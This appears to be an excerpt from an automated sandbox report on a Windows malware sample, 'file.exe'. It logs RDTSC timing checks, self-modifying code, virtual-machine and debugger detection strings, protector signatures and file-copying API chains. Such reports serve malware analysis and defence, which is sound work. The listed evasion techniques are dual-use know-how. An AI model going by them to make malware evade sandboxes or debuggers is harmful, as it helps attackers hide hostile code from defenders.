              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1426A31 second address: 1426A37 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1426E46 second address: 1426E5F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnc 00007F76D8D570E6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d jc 00007F76D8D57101h 0x00000013 push eax 0x00000014 push edx 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1426F88 second address: 1426F91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1426F91 second address: 1426F95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1426F95 second address: 1426FCC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76D8527F72h 0x00000007 jnc 00007F76D8527F66h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop ebx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F76D8527F77h 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1426FCC second address: 1426FD0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1426FD0 second address: 1426FF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F76D8527F73h 0x0000000c push edx 0x0000000d pop edx 0x0000000e popad 0x0000000f jnp 00007F76D8527F6Ch 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1431773 second address: 143177D instructions: 0x00000000 rdtsc 0x00000002 jp 00007F76D8D570E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143177D second address: 143178A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007F76D8527F66h 0x00000009 push edi 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14318F3 second address: 14318FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1438F13 second address: 1438F28 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jo 00007F76D8527F66h 0x0000000b jne 00007F76D8527F66h 0x00000011 popad 0x00000012 push ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14377BD second address: 14377EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F76D8D570E6h 0x0000000a popad 0x0000000b pop esi 0x0000000c push edi 0x0000000d jmp 00007F76D8D570F7h 0x00000012 pushad 0x00000013 jl 00007F76D8D570E6h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1437BB1 second address: 1437BB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1437BB5 second address: 1437BB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1437D32 second address: 1437DAE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76D8527F79h 0x00000007 push ecx 0x00000008 jmp 00007F76D8527F70h 0x0000000d jmp 00007F76D8527F75h 0x00000012 pop ecx 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F76D8527F77h 0x0000001c push edi 0x0000001d jmp 00007F76D8527F77h 0x00000022 jp 00007F76D8527F66h 0x00000028 pop edi 0x00000029 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1437DAE second address: 1437DBE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F76D8D570ECh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1437DBE second address: 1437DCE instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007F76D8527F66h 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1438C16 second address: 1438C1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1438C1C second address: 1438C22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143C4C7 second address: 143C4CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143C4CD second address: 143C4D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143C4D6 second address: 143C4DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143C4DA second address: 143C4E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76D8527F6Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143C4E8 second address: 143C4FF instructions: 0x00000000 rdtsc 0x00000002 jng 00007F76D8D570F2h 0x00000008 jc 00007F76D8D570E6h 0x0000000e je 00007F76D8D570E6h 0x00000014 push edi 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143C4FF second address: 143C515 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 jg 00007F76D8527F68h 0x0000000e push eax 0x0000000f push edx 0x00000010 push edx 0x00000011 pop edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143C515 second address: 143C51B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143FCA2 second address: 143FCA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143FCA8 second address: 143FCB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push esi 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143FCB2 second address: 143FCBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143F490 second address: 143F4A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push edi 0x00000008 jng 00007F76D8D570E6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143F5F0 second address: 143F628 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F76D8527F76h 0x00000009 popad 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d ja 00007F76D8527F7Ah 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143F628 second address: 143F632 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F76D8D570E6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143F632 second address: 143F65F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76D8527F77h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F76D8527F6Eh 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1447C3B second address: 1447C4B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76D8D570ECh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1447C4B second address: 1447C51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1447C51 second address: 1447C56 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1445DB8 second address: 1445DBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13EA519 second address: 13EA542 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jnp 00007F76D8527F6Ch 0x0000000d jbe 00007F76D8527F66h 0x00000013 popad 0x00000014 push eax 0x00000015 push ebx 0x00000016 pushad 0x00000017 jmp 00007F76D8527F70h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 123F989 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 13D9CD0 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 13E4A53 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 1464FAB instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\file.exeEvaded block: after key decisiongraph_1-26909
              Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetSystemTime,DecisionNodesgraph_1-26977
              Source: C:\Users\user\Desktop\file.exeAPI coverage: 4.2 %
              Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_01003910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_01003910
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_010018A0 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,1_2_010018A0
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_01004B10 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_01004B10
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_01004B29 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,1_2_01004B29
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_01002390 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,1_2_01002390
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_010023A9 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,1_2_010023A9
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0100CBE0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,1_2_0100CBE0
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0100E210 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,1_2_0100E210
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_01001250 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_01001250
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00FFDB99 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_00FFDB99
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_01001269 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_01001269
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00FFDB80 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,GetFileAttributesA,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_00FFDB80
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0100DD30 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy,1_2_0100DD30
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0100D530 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_0100D530
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00FF16B9 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,1_2_00FF16B9
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00FF16A0 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,1_2_00FF16A0
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_01011BF0 lstrcpy,ExitProcess,GetSystemInfo,ExitProcess,GetUserDefaultLangID,ExitProcess,ExitProcess,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,OpenEventA,CloseHandle,Sleep,OpenEventA,CreateEventA,CloseHandle,ExitProcess,1_2_01011BF0
              Source: file.exe, file.exe, 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
              Source: file.exe, 00000001.00000002.1389602747.0000000000DC4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.1389602747.0000000000D95000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: file.exe, 00000001.00000002.1389602747.0000000000D4E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
              Source: file.exe, 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_1-25721
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_1-25585
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_1-25714
              Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

              Anti Debugging

Source: C:\Users\user\Desktop\file.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | File opened: NTICE
Source: C:\Users\user\Desktop\file.exe | File opened: SICE
Source: C:\Users\user\Desktop\file.exe | File opened: SIWVID
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00FF4A60 VirtualProtect 00000000,00000004,00000100,? 1_2_00FF4A60
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_01016390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_01016390
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_01016390 mov eax, dword ptr fs:[00000030h] 1_2_01016390
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_01012A40 GetProcessHeap,RtlAllocateHeap,GetUserNameA,1_2_01012A40
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\file.exe | Memory protected: page guard

              HIPS / PFW / Operating System Protection Evasion

Source: Yara match | File source: Process Memory Space: file.exe PID: 7708, type: MEMORYSTR
